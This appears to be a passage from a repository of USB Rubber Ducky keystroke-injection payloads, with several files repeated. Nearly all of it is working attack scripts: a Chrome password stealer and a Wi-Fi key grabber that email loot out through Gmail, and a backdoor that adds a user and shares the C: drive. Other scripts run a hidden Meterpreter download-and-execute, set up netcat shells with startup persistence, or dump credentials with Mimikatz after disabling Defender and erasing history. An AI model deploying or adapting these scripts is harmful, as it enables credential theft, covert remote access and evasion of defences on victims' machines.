bypass uac so it can save to C:\ drive and pastes in password 6 | REM saves to C:\passwords.txt folder, closes notepad 7 | REM sends files via gmail to account. 8 | DELAY 2000 9 | REM -------------open chrome 10 | GUI r 11 | DELAY 1000 12 | STRING chrome 13 | DELAY 1000 14 | ENTER 15 | DELAY 4000 16 | REM -------------copy plaintext password 17 | STRING chrome://settings/passwords 18 | ENTER 19 | DELAY 2000 20 | STRING facebook 21 | DELAY 500 22 | TAB 23 | DELAY 500 24 | DOWN 25 | DELAY 500 26 | TAB 27 | DELAY 500 28 | TAB 29 | DELAY 500 30 | ENTER 31 | DELAY 500 32 | ALT D 33 | DELAY 500 34 | TAB 35 | DELAY 500 36 | TAB 37 | DELAY 500 38 | TAB 39 | DELAY 500 40 | CTRL C 41 | DELAY 500 42 | ALT F4 43 | DELAY 500 44 | REM -------------save file to music folder as passwords.txt 45 | GUI R 46 | DELAY 500 47 | STRING powershell start-process notepad.exe -Verb runAs 48 | DELAY 500 49 | ENTER 50 | DELAY 2000 51 | ALT y 52 | DELAY 1000 53 | CTRL V 54 | DELAY 500 55 | ALT f 56 | DELAY 500 57 | STRING s 58 | DELAY 500 59 | STRING passwords.txt 60 | DELAY 500 61 | TAB 62 | TAB 63 | TAB 64 | TAB 65 | TAB 66 | TAB 67 | TAB 68 | TAB 69 | TAB 70 | STRING c 71 | DELAY 1000 72 | STRING l 73 | DELAY 500 74 | ENTER 75 | DELAY 500 76 | ALT S 77 | DELAY 1000 78 | ALT F4 79 | DELAY 500 80 | REM -------------email log via gmail 81 | GUI r 82 | DELAY 500 83 | STRING powershell 84 | ENTER 85 | DELAY 1000 86 | STRING $SMTPServer = 'smtp.gmail.com' 87 | ENTER 88 | STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 89 | ENTER 90 | STRING $SMTPInfo.EnableSsl = $true 91 | ENTER 92 | STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('youremail@gmail.com', 'password'); 93 | ENTER 94 | STRING $ReportEmail = New-Object System.Net.Mail.MailMessage 95 | ENTER 96 | STRING $ReportEmail.From = 'youremail@gmail.com' 97 | ENTER 98 | STRING $ReportEmail.To.Add('toemail@gmail.com') 99 | ENTER 100 | STRING $ReportEmail.Subject = 'Ducky chrome passwords' 101 | ENTER 102 | STRING $ReportEmail.Body = 'Attached is your list of passwords.' 103 | ENTER 104 | STRING $ReportEmail.Attachments.Add('c:\passwords.txt') 105 | ENTER 106 | STRING $SMTPInfo.Send($ReportEmail) 107 | ENTER 108 | DELAY 3000 109 | STRING exit 110 | ENTER 111 | -------------------------------------------------------------------------------- /Needs Updating/Needs Updating/Payload Data Exfiltration Backdoor: -------------------------------------------------------------------------------- 1 | REM # Backdoor - Data Exfiltration 2 | REM # Credit goes to Crumb93 and BrainEater from the Hak5 forums for the Wifi Password one liner 3 | DELAY 1000 4 | WINDOWS d 5 | DELAY 450 6 | WINDOWS r 7 | DELAY 450 8 | STRING powershell Start-Process powershell -Verb runAs 9 | DELAY 30 10 | ENTER 11 | DELAY 500 12 | ALT y 13 | DELAY 1000 14 | REM ***************** 15 | REM # We're going to grab all wifi passwords 16 | REM ***************** 17 | STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize > C:\Information.txt 18 | ENTER 19 | DELAY 500 20 | REM ***************** 21 | REM # Now we'll grab Network Information (Local IP, Public IP, Hostname) 22 | REM ***************** 23 | STRING $command = {hostname; Get-NetIpaddress | Where PrefixOrigin -EQ DHCP; Invoke-RestMethod http://ipinfo.io/json | Select -exp ip} 24 | ENTER 25 | DELAY 60 26 | STRING $command.InvokeReturnAsIs() | Out-File C:\Information.txt -Append 27 | ENTER 28 | DELAY 400 29 | REM ***************** 30 | REM # We're going to add a user 31 | REM ***************** 32 | STRING NET USER Microsoft "l33t" /ADD 33 | ENTER 34 | DELAY 100 35 | REM ***************** 36 | REM # Now we're going to share the C:\ drive out 37 | REM ***************** 38 | STRING New-SmbShare -Name "Microsoft" -Path "C:\" -FullAccess "Microsoft" 39 | ENTER 40 | DELAY 100 41 | REM ***************** 42 | REM # Let's e-mail ourselves and clean up 43 | REM ***************** 44 | DELAY 1000 45 | STRING $SMTPServer = 'smtp.gmail.com' 46 | ENTER 47 | STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 48 | ENTER 49 | STRING $SMTPInfo.EnableSSL = $true 50 | ENTER 51 | STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('EMAILHERE', 'PASSWORDHERE!') 52 | ENTER 53 | STRING $ReportEmail = New-Object System.Net.Mail.MailMessage 54 | ENTER 55 | STRING $ReportEmail.From = 'EMAILHERE' 56 | ENTER 57 | STRING $ReportEmail.To.Add('EMAILHERE') 58 | ENTER 59 | STRING $ReportEmail.Subject = 'Hello from the duck' 60 | ENTER 61 | STRING $ReportEmail.Body = (Get-Content C:\Information.txt | out-string) 62 | ENTER 63 | STRING $SMTPInfo.Send($ReportEmail) 64 | ENTER 65 | DELAY 100 66 | REM ***************** 67 | REM # Cleanup 68 | REM ***************** 69 | STRING del C:\Information.txt 70 | ENTER 71 | STRING exit 72 | ENTER 73 | -------------------------------------------------------------------------------- /Needs Updating/Needs Updating/Payload Fast Meterpreter: -------------------------------------------------------------------------------- 1 | REM Opens a meterpreter using a pastebin link 2 | REM See https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/remote_access/SingleSecondShell/readme.md 3 | REM For how to create a link to your personal shellcode 4 | DELAY 2000 5 | GUI r 6 | DELAY 1000 7 | STRING powershell -windowstyle hidden $u='YOUR_LINK';$r=Invoke-WebRequest -Uri $u;powershell -nop -e $r.content 8 | ENTER 9 | GUI r 10 | DELAY 1000 11 | STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 12 | -------------------------------------------------------------------------------- /Needs Updating/Needs Updating/Payload Netcat Reverse Shell: -------------------------------------------------------------------------------- 1 | REM Info and source: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload-Netcat-Reverse-Shell 2 | REM Title: Netcat Reverse Shell 3 | REM Author: Kanishk Singh 4 | REM Version: 1 5 | 6 | REM Change the following details: 7 | REM [NETCAT_DOWNLOAD_LINK]: Your Netcat download link. 8 | REM [PORT]: The port on the target machine you want netcat to listen on. 9 | REM Directory: Use something other than TEMP if you want to. 10 | 11 | DELAY 200 12 | REM —> Minimize all windows 13 | WINDOWS d 14 | GUI r 15 | DELAY 500 16 | STRING powershell Start-Process cmd -Verb RunAs 17 | ENTER 18 | DELAY 1500 19 | ALT y 20 | DELAY 500 21 | STRING cd TEMP 22 | ENTER 23 | 24 | REM —> Kills already running Netcat instance (if any) 25 | STRING TASKKILL /im nc.exe /f 26 | ENTER 27 | REM —> Delete nc.exe file if it already exists 28 | STRING erase /Q nc.exe 29 | ENTER 30 | REM —> Delete Start batch file if it already exists 31 | STRING erase /Q Start.bat 32 | ENTER 33 | REM —> Delete Invisible.vbs in temp folder, if it already exists 34 | STRING erase /Q invisible.vbs 35 | ENTER 36 | REM —> Delete invisible.vbs file in Startup if it already exists 37 | STRING erase /Q “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\invisible.vbs” 38 | ENTER 39 | DELAY 500 40 | 41 | REM —> Downloads NetCat 42 | STRING powershell (new-object System.Net.WebClient).DownloadFile(‘http://[NETCAT_DOWNLOAD_LINK]/nc.exe’,‘nc.exe’) 43 | ENTER 44 | DELAY 500 45 | 46 | REM —> Creates a batch file to start listening 47 | STRING copy con Start.bat 48 | ENTER 49 | STRING nc -lp [PORT] -vv -e cmd.exe -L 50 | ENTER 51 | CONTROL z 52 | ENTER 53 | 54 | REM —> Starts batch file invisibly 55 | STRING copy con invisible.vbs 56 | ENTER 57 | STRING Set WshShell = CreateObject(“WScript.Shell” ) 58 | ENTER 59 | STRING WshShell.Run chr(34) & “TEMP\Start.bat” & Chr(34), 0 60 | ENTER 61 | STRING Set WshShell = Nothing 62 | ENTER 63 | CONTROL z 64 | ENTER 65 | REM —> Add netcat to allowed programs list, enabling it to communicate through the firewall seamlessly 66 | STRING netsh advfirewall firewall add rule name=“Netcat” dir=in action=allow program=“TEMP\nc.exe” enable=yes 67 | ENTER 68 | STRING start invisible.vbs 69 | ENTER 70 | DELAY 100 71 | 72 | REM —> Copies invisible.vbs to startup folder for persistence 73 | STRING copy “invisible.vbs” “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp” 74 | ENTER 75 | REM —> Kills CMD while nc.exe continues running in background, remove Ducky after CMD closes 76 | STRING exit 77 | ENTER 78 | -------------------------------------------------------------------------------- /Needs Updating/Needs Updating/Payload Pinapple Association: -------------------------------------------------------------------------------- 1 | REM Brought to you by Xcellerator 2 | DEFAULT_DELAY 200 3 | DELAY 3000 4 | GUI r 5 | STRING cmd 6 | MENU 7 | STRING a 8 | ENTER 9 | LEFT 10 | ENTER 11 | STRING cd %TEMP% 12 | ENTER 13 | STRING powershell (new-object System.Net.WebClient).DownloadFile('http://pastebin.com/raw.php?i=8WsHSWdZ','%TEMP%\a.xml') 14 | ENTER 15 | DELAY 1000 16 | ENTER 17 | STRING netsh wlan add profile filename="a.xml" interface="Wireless Network Connection" 18 | ENTER 19 | STRING del a.xml 20 | ENTER 21 | STRING exit 22 | ENTER 23 | -------------------------------------------------------------------------------- /Needs Updating/Needs Updating/auto defacer: -------------------------------------------------------------------------------- 1 | REM Auto Defacer for Ubuntu Based Machines running Apache. 2 | REM Author: Xcellerator 3 | REM Description: Automatically defaces index page of an apache web server. 4 | DEFAULT_DELAY 200 5 | ALT F2 6 | STRING terminal 7 | ENTER 8 | STRING cd /var/www 9 | ENTER 10 | STRING mv index.* index.bak 11 | ENTER 12 | STRING touch index.html 13 | ENTER 14 | STRING nano index.html 15 | ENTER 16 | STRING

You have been hacked by the USB Rubber Ducky!

17 | ENTER 18 | STRING
19 | ENTER 20 | STRING
Your old index page can be found here.
21 | CONTROL x 22 | STRING y 23 | ENTER 24 | STRING exit 25 | ENTER 26 | -------------------------------------------------------------------------------- /Needs Updating/Netcat-Revershell-NEW/Netcat-Payload.txt: -------------------------------------------------------------------------------- 1 | REM Change The IP and the Port, and for the netcat download link you can use it but it sure will expired so change it 2 | REM subscribe to my YouTube channel https://www.youtube.com/channel/UCL5HhLmJ7gSkf9zQu39LRoQ (dont really post anything related to this tho xD) 3 | REM for the ip address and the port pls do remove this symbol (<>) 4 | 5 | DELAY 1000 6 | GUI r 7 | DELAY 1000 8 | 9 | STRING cmd 10 | ENTER 11 | DELAY 1000 12 | 13 | STRING cd / & mkdir win & cd win & echo (wget 'https://cdn.discordapp.com/attachments/823520101415911464/826813046500491264/nc64.exe' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1 14 | ENTER 15 | DELAY 3000 16 | 17 | STRING START /MIN a.exe -e cmd.exe -d & exit 18 | ENTER 19 | -------------------------------------------------------------------------------- /Needs Updating/Netcat-Revershell-NEW/README.md: -------------------------------------------------------------------------------- 1 | # Netcat 2 | A Simple Script to execute netcat onto victim computer in order for you to have access fully to their computer. 3 | 4 | A CMD SCRIPT 5 | 6 | ALSO DOWNLOADING NETCAT USING DISCORD WINDOWS DEFENDER WILL DETECT IT AS A VIRUS IF YOU WANT TO BYPASS THAT MODIFY THE NETCAT PAYLOAD TO TURN OF WINDOWS DEFENDER or JUST CHANGE THE "NETCAT" DOWNLOAD TO YOUR WEB SERVER or Anonfile. CHEERS :3 7 | 8 | PAYLOADS 9 | - LOOK UP MY GUY 10 | 11 | 12 | -------------------------------------------------------------------------------- /Needs Updating/New Mimikatz Payload/duckycode.txt: -------------------------------------------------------------------------------- 1 | REM Author: shutin who just tied two other authors together: 2 | REM overwraith for the exe running stuff and redmeatuk who brought mimikatz to the party 3 | REM Name: Runmimikatz.txt 4 | DEFAULT_DELAY 75 5 | DELAY 3000 6 | REM get a cmd prompt this way because it's admin and we need that for mimikatz 7 | CONTROL ESCAPE 8 | DELAY 1000 9 | STRING cmd 10 | DELAY 1000 11 | REM the admin part booyah 12 | CTRL-SHIFT ENTER 13 | DELAY 1000 14 | ALT y 15 | DELAY 300 16 | ENTER 17 | 18 | REM Change directories because System32 appears to be protected. 19 | STRING CD %TEMP% 20 | ENTER 21 | 22 | REM Make batch file that waits for SD card to mount. 23 | REM Delete batch file if already exists 24 | STRING erase /Q DuckyWait.bat 25 | ENTER 26 | STRING copy con DuckyWait.bat 27 | ENTER 28 | REM DuckyWait.bat contents 29 | STRING :while1 30 | ENTER 31 | STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d 32 | ENTER 33 | STRING if Exist %myd% ( 34 | ENTER 35 | STRING goto break 36 | ENTER 37 | STRING ) 38 | ENTER 39 | STRING timeout /t 30 40 | ENTER 41 | STRING goto while1 42 | ENTER 43 | STRING :break 44 | ENTER 45 | REM 46 | REM FINALLY ACTUALLY RUN AN EXE 47 | STRING START %myd%\mimikatz.exe 48 | ENTER 49 | CONTROL z 50 | ENTER 51 | STRING DuckyWait.bat 52 | ENTER 53 | DELAY 1000 54 | ENTER 55 | DELAY 3000 56 | STRING privilege::debug 57 | DELAY 300 58 | ENTER 59 | DELAY 500 60 | STRING log %myd%\Output.log 61 | DELAY 200 62 | ENTER 63 | DELAY 1000 64 | STRING sekurlsa::logonPasswords full 65 | DELAY 300 66 | ENTER 67 | DELAY 1000 68 | STRING vault::cred 69 | DELAY 300 70 | ENTER 71 | DELAY 500 72 | ALT F4 73 | DELAY 500 74 | STRING erase /Q DuckyWait.bat 75 | DELAY 300 76 | ENTER 77 | DELAY 400 78 | ALT F4 79 | -------------------------------------------------------------------------------- /Needs Updating/New Mimikatz Payload/inject.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Meldramiriel/duckyscript-for-flipperzero/017c1fb6ef3c20526fcc6abe65fe784f013f56fc/Needs Updating/New Mimikatz Payload/inject.bin -------------------------------------------------------------------------------- /Needs Updating/PW stealer mimkatz: -------------------------------------------------------------------------------- 1 | REM Title: windows password grabber 2 | REM Arthor makozort, https://github.com/makozort 3 | REM Target: windows 10 (with admin access), might work with windows 7 idk 4 | REM THIS IS FOR AUTHORISED USE ON MACHINES YOU EITHER OWN OR HAVE BEEN GIVEN ACCESS TO PEN TEST, MAKOZORT IS NO LIABLE FOR ANY MISUSE OF THIS SCRIPT 5 | REM --------------set default delay based on targets computer speed, 350 is around mid range (I think) 6 | DEFAULT_DELAY 350 7 | REM -------------first delay is 1 second (you may need more) to let windows set up the "keyboard" 8 | DELAY 1000 9 | REM disable windows defender, you may have to fiddle with this 10 | CTRL ESC 11 | DELAY 300 12 | STRING windows defender 13 | DELAY 300 14 | ENTER 15 | DELAY 1000 16 | ENTER 17 | TAB 18 | TAB 19 | TAB 20 | TAB 21 | DELAY 300 22 | ENTER 23 | DELAY 600 24 | SPACE 25 | DELAY 600 26 | LEFT 27 | ENTER 28 | DELAY 300 29 | ALT F4 30 | REM ------------open powershell as admin and set an exclusion path in the C:\Users path 31 | GUI r 32 | STRING powershell 33 | CTRL-SHIFT ENTER 34 | DELAY 600 35 | ALT y 36 | STRING Set-MpPreference -ExclusionPath C:\Users 37 | ENTER 38 | STRING exit 39 | ENTER 40 | REM -------------download mimikatz 41 | GUI r 42 | STRING cmd 43 | CTRL-SHIFT ENTER 44 | DELAY 600 45 | ALT y 46 | STRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe') 47 | ENTER 48 | REM ------------run the following mimikatz commands and print results in new txt file 49 | DELAY 4000 50 | STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt; 51 | ENTER 52 | STRING privilege::debug 53 | ENTER 54 | STRING sekurlsa::logonPasswords full 55 | ENTER 56 | STRING exit 57 | ENTER 58 | REM< --------- delete mimikatz 59 | STRING del %TEMP%\pw.exe 60 | ENTER 61 | STRING exit 62 | ENTER 63 | REM -------------email the pwlog.txt to your email 64 | GUI r 65 | STRING powershell 66 | CTRL-SHIFT ENTER 67 | DELAY 600 68 | ALT y 69 | STRING Remove-MpPreference -ExclusionPath C:\Users 70 | ENTER 71 | STRING $SMTPServer = 'smtp.gmail.com' 72 | ENTER 73 | STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 74 | ENTER 75 | STRING $SMTPInfo.EnableSsl = $true 76 | ENTER 77 | STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@ 78 | SHIFT 2 79 | STRING gmail.com', 'PASSWORDHERE'); 80 | ENTER 81 | STRING $ReportEmail = New-Object System.Net.Mail.MailMessage 82 | ENTER 83 | STRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@ 84 | SHIFT 2 85 | STRING gmail.com' 86 | ENTER 87 | STRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@ 88 | SHIFT 2 89 | STRING gmail.com') 90 | ENTER 91 | STRING $ReportEmail.Subject = 'Hello from the ducky' 92 | ENTER 93 | STRING $ReportEmail.Body = 'Attached is your duck report.' 94 | ENTER 95 | STRING $ReportEmail.Attachments.Add('c:\pwlog.txt') 96 | ENTER 97 | STRING $SMTPInfo.Send($ReportEmail) 98 | ENTER 99 | DELAY 4000 100 | STRING exit 101 | ENTER 102 | REM ------cleanup time 103 | GUI r 104 | STRING powershell 105 | CTRL-SHIFT ENTER 106 | DELAY 600 107 | ALT y 108 | REM ----------delete the txt file 109 | STRING del c:\pwlog.txt 110 | ENTER 111 | REM -------remove powershell history (this probably wont be enough to remove all traces of you, this is just to prevent inital investigations 112 | STRING Remove-Item (Get-PSreadlineOption).HistorySavePath 113 | ENTER 114 | STRING exit 115 | ENTER 116 | REM ------lock the pc 117 | GUI 1 118 | -------------------------------------------------------------------------------- /Needs Updating/Payload Chrome Password Stealer: -------------------------------------------------------------------------------- 1 | REM Author: Nuk3leus 2 | REM Ducky chrome password stealer: 1.0 3 | REM Target: Windows 7 4 | REM Description: Opens chrome, navigates to chrome settings, navigates to saved passwords, searches for facebook, shows password, copys password 5 | REM closes chrome, Opens notepad with bypass uac so it can save to C:\ drive and pastes in password 6 | REM saves to C:\passwords.txt folder, closes notepad 7 | REM sends files via gmail to account. 8 | DELAY 2000 9 | REM -------------open chrome 10 | GUI r 11 | DELAY 1000 12 | STRING chrome 13 | DELAY 1000 14 | ENTER 15 | DELAY 4000 16 | REM -------------copy plaintext password 17 | STRING chrome://settings/passwords 18 | ENTER 19 | DELAY 2000 20 | STRING facebook 21 | DELAY 500 22 | TAB 23 | DELAY 500 24 | DOWN 25 | DELAY 500 26 | TAB 27 | DELAY 500 28 | TAB 29 | DELAY 500 30 | ENTER 31 | DELAY 500 32 | ALT D 33 | DELAY 500 34 | TAB 35 | DELAY 500 36 | TAB 37 | DELAY 500 38 | TAB 39 | DELAY 500 40 | CTRL C 41 | DELAY 500 42 | ALT F4 43 | DELAY 500 44 | REM -------------save file to music folder as passwords.txt 45 | GUI R 46 | DELAY 500 47 | STRING powershell start-process notepad.exe -Verb runAs 48 | DELAY 500 49 | ENTER 50 | DELAY 2000 51 | ALT y 52 | DELAY 1000 53 | CTRL V 54 | DELAY 500 55 | ALT f 56 | DELAY 500 57 | STRING s 58 | DELAY 500 59 | STRING passwords.txt 60 | DELAY 500 61 | TAB 62 | TAB 63 | TAB 64 | TAB 65 | TAB 66 | TAB 67 | TAB 68 | TAB 69 | TAB 70 | STRING c 71 | DELAY 1000 72 | STRING l 73 | DELAY 500 74 | ENTER 75 | DELAY 500 76 | ALT S 77 | DELAY 1000 78 | ALT F4 79 | DELAY 500 80 | REM -------------email log via gmail 81 | GUI r 82 | DELAY 500 83 | STRING powershell 84 | ENTER 85 | DELAY 1000 86 | STRING $SMTPServer = 'smtp.gmail.com' 87 | ENTER 88 | STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 89 | ENTER 90 | STRING $SMTPInfo.EnableSsl = $true 91 | ENTER 92 | STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('youremail@gmail.com', 'password'); 93 | ENTER 94 | STRING $ReportEmail = New-Object System.Net.Mail.MailMessage 95 | ENTER 96 | STRING $ReportEmail.From = 'youremail@gmail.com' 97 | ENTER 98 | STRING $ReportEmail.To.Add('toemail@gmail.com') 99 | ENTER 100 | STRING $ReportEmail.Subject = 'Ducky chrome passwords' 101 | ENTER 102 | STRING $ReportEmail.Body = 'Attached is your list of passwords.' 103 | ENTER 104 | STRING $ReportEmail.Attachments.Add('c:\passwords.txt') 105 | ENTER 106 | STRING $SMTPInfo.Send($ReportEmail) 107 | ENTER 108 | DELAY 3000 109 | STRING exit 110 | ENTER 111 | -------------------------------------------------------------------------------- /Needs Updating/Payload Data Exfiltration Backdoor: -------------------------------------------------------------------------------- 1 | REM # Backdoor - Data Exfiltration 2 | REM # Credit goes to Crumb93 and BrainEater from the Hak5 forums for the Wifi Password one liner 3 | DELAY 1000 4 | WINDOWS d 5 | DELAY 450 6 | WINDOWS r 7 | DELAY 450 8 | STRING powershell Start-Process powershell -Verb runAs 9 | DELAY 30 10 | ENTER 11 | DELAY 500 12 | ALT y 13 | DELAY 1000 14 | REM ***************** 15 | REM # We're going to grab all wifi passwords 16 | REM ***************** 17 | STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize > C:\Information.txt 18 | ENTER 19 | DELAY 500 20 | REM ***************** 21 | REM # Now we'll grab Network Information (Local IP, Public IP, Hostname) 22 | REM ***************** 23 | STRING $command = {hostname; Get-NetIpaddress | Where PrefixOrigin -EQ DHCP; Invoke-RestMethod http://ipinfo.io/json | Select -exp ip} 24 | ENTER 25 | DELAY 60 26 | STRING $command.InvokeReturnAsIs() | Out-File C:\Information.txt -Append 27 | ENTER 28 | DELAY 400 29 | REM ***************** 30 | REM # We're going to add a user 31 | REM ***************** 32 | STRING NET USER Microsoft "l33t" /ADD 33 | ENTER 34 | DELAY 100 35 | REM ***************** 36 | REM # Now we're going to share the C:\ drive out 37 | REM ***************** 38 | STRING New-SmbShare -Name "Microsoft" -Path "C:\" -FullAccess "Microsoft" 39 | ENTER 40 | DELAY 100 41 | REM ***************** 42 | REM # Let's e-mail ourselves and clean up 43 | REM ***************** 44 | DELAY 1000 45 | STRING $SMTPServer = 'smtp.gmail.com' 46 | ENTER 47 | STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 48 | ENTER 49 | STRING $SMTPInfo.EnableSSL = $true 50 | ENTER 51 | STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('EMAILHERE', 'PASSWORDHERE!') 52 | ENTER 53 | STRING $ReportEmail = New-Object System.Net.Mail.MailMessage 54 | ENTER 55 | STRING $ReportEmail.From = 'EMAILHERE' 56 | ENTER 57 | STRING $ReportEmail.To.Add('EMAILHERE') 58 | ENTER 59 | STRING $ReportEmail.Subject = 'Hello from the duck' 60 | ENTER 61 | STRING $ReportEmail.Body = (Get-Content C:\Information.txt | out-string) 62 | ENTER 63 | STRING $SMTPInfo.Send($ReportEmail) 64 | ENTER 65 | DELAY 100 66 | REM ***************** 67 | REM # Cleanup 68 | REM ***************** 69 | STRING del C:\Information.txt 70 | ENTER 71 | STRING exit 72 | ENTER 73 | -------------------------------------------------------------------------------- /Needs Updating/Payload Fast Meterpreter: -------------------------------------------------------------------------------- 1 | REM Opens a meterpreter using a pastebin link 2 | REM See https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/remote_access/SingleSecondShell/readme.md 3 | REM For how to create a link to your personal shellcode 4 | DELAY 2000 5 | GUI r 6 | DELAY 1000 7 | STRING powershell -windowstyle hidden $u='YOUR_LINK';$r=Invoke-WebRequest -Uri $u;powershell -nop -e $r.content 8 | ENTER 9 | GUI r 10 | DELAY 1000 11 | STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 12 | -------------------------------------------------------------------------------- /Needs Updating/Payload Netcat Reverse Shell: -------------------------------------------------------------------------------- 1 | REM Info and source: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload-Netcat-Reverse-Shell 2 | REM Title: Netcat Reverse Shell 3 | REM Author: Kanishk Singh 4 | REM Version: 1 5 | 6 | REM Change the following details: 7 | REM [NETCAT_DOWNLOAD_LINK]: Your Netcat download link. 8 | REM [PORT]: The port on the target machine you want netcat to listen on. 9 | REM Directory: Use something other than TEMP if you want to. 10 | 11 | DELAY 200 12 | REM —> Minimize all windows 13 | WINDOWS d 14 | GUI r 15 | DELAY 500 16 | STRING powershell Start-Process cmd -Verb RunAs 17 | ENTER 18 | DELAY 1500 19 | ALT y 20 | DELAY 500 21 | STRING cd TEMP 22 | ENTER 23 | 24 | REM —> Kills already running Netcat instance (if any) 25 | STRING TASKKILL /im nc.exe /f 26 | ENTER 27 | REM —> Delete nc.exe file if it already exists 28 | STRING erase /Q nc.exe 29 | ENTER 30 | REM —> Delete Start batch file if it already exists 31 | STRING erase /Q Start.bat 32 | ENTER 33 | REM —> Delete Invisible.vbs in temp folder, if it already exists 34 | STRING erase /Q invisible.vbs 35 | ENTER 36 | REM —> Delete invisible.vbs file in Startup if it already exists 37 | STRING erase /Q “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\invisible.vbs” 38 | ENTER 39 | DELAY 500 40 | 41 | REM —> Downloads NetCat 42 | STRING powershell (new-object System.Net.WebClient).DownloadFile(‘http://[NETCAT_DOWNLOAD_LINK]/nc.exe’,‘nc.exe’) 43 | ENTER 44 | DELAY 500 45 | 46 | REM —> Creates a batch file to start listening 47 | STRING copy con Start.bat 48 | ENTER 49 | STRING nc -lp [PORT] -vv -e cmd.exe -L 50 | ENTER 51 | CONTROL z 52 | ENTER 53 | 54 | REM —> Starts batch file invisibly 55 | STRING copy con invisible.vbs 56 | ENTER 57 | STRING Set WshShell = CreateObject(“WScript.Shell” ) 58 | ENTER 59 | STRING WshShell.Run chr(34) & “TEMP\Start.bat” & Chr(34), 0 60 | ENTER 61 | STRING Set WshShell = Nothing 62 | ENTER 63 | CONTROL z 64 | ENTER 65 | REM —> Add netcat to allowed programs list, enabling it to communicate through the firewall seamlessly 66 | STRING netsh advfirewall firewall add rule name=“Netcat” dir=in action=allow program=“TEMP\nc.exe” enable=yes 67 | ENTER 68 | STRING start invisible.vbs 69 | ENTER 70 | DELAY 100 71 | 72 | REM —> Copies invisible.vbs to startup folder for persistence 73 | STRING copy “invisible.vbs” “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp” 74 | ENTER 75 | REM —> Kills CMD while nc.exe continues running in background, remove Ducky after CMD closes 76 | STRING exit 77 | ENTER 78 | -------------------------------------------------------------------------------- /Needs Updating/Payload Pinapple Association: -------------------------------------------------------------------------------- 1 | REM Brought to you by Xcellerator 2 | DEFAULT_DELAY 200 3 | DELAY 3000 4 | GUI r 5 | STRING cmd 6 | MENU 7 | STRING a 8 | ENTER 9 | LEFT 10 | ENTER 11 | STRING cd %TEMP% 12 | ENTER 13 | STRING powershell (new-object System.Net.WebClient).DownloadFile('http://pastebin.com/raw.php?i=8WsHSWdZ','%TEMP%\a.xml') 14 | ENTER 15 | DELAY 1000 16 | ENTER 17 | STRING netsh wlan add profile filename="a.xml" interface="Wireless Network Connection" 18 | ENTER 19 | STRING del a.xml 20 | ENTER 21 | STRING exit 22 | ENTER 23 | -------------------------------------------------------------------------------- /Needs Updating/WiFi Password Exfiltration/duckycode.txt: -------------------------------------------------------------------------------- 1 | REM 2 | REM _______ _ _______ _ 3 | REM |__ __| | | |__ __| | | 4 | REM | |_ _| | ___ _ __| | ___ ___| |__ 5 | REM | | | | | |/ _ \ '__| |/ _ \/ __| '_ \ 6 | REM | | |_| | | __/ | | | __/ (__| | | | 7 | REM |_|\__, |_|\___|_| |_|\___|\___|_| |_| 8 | REM __/ | 9 | REM |___/ 10 | REM 11 | REM WiFi Password Exfiltration script by TylerTechNZ 12 | REM 13 | REM --> Create Obfuscated CMD 14 | DELAY 2000 15 | WINDOWS r 16 | DELAY 200 17 | STRING cmd 18 | ENTER 19 | DELAY 200 20 | STRING MODE 20,1 21 | ENTER 22 | DELAY 200 23 | STRING COLOR FE 24 | ENTER 25 | REM --> Start Powershell, get all WiFi passwords and Export to CSV 26 | DELAY 200 27 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass "(netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\W+\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Export-Csv temp.csv" 28 | ENTER 29 | REM --> Wait a couple of seconds and start 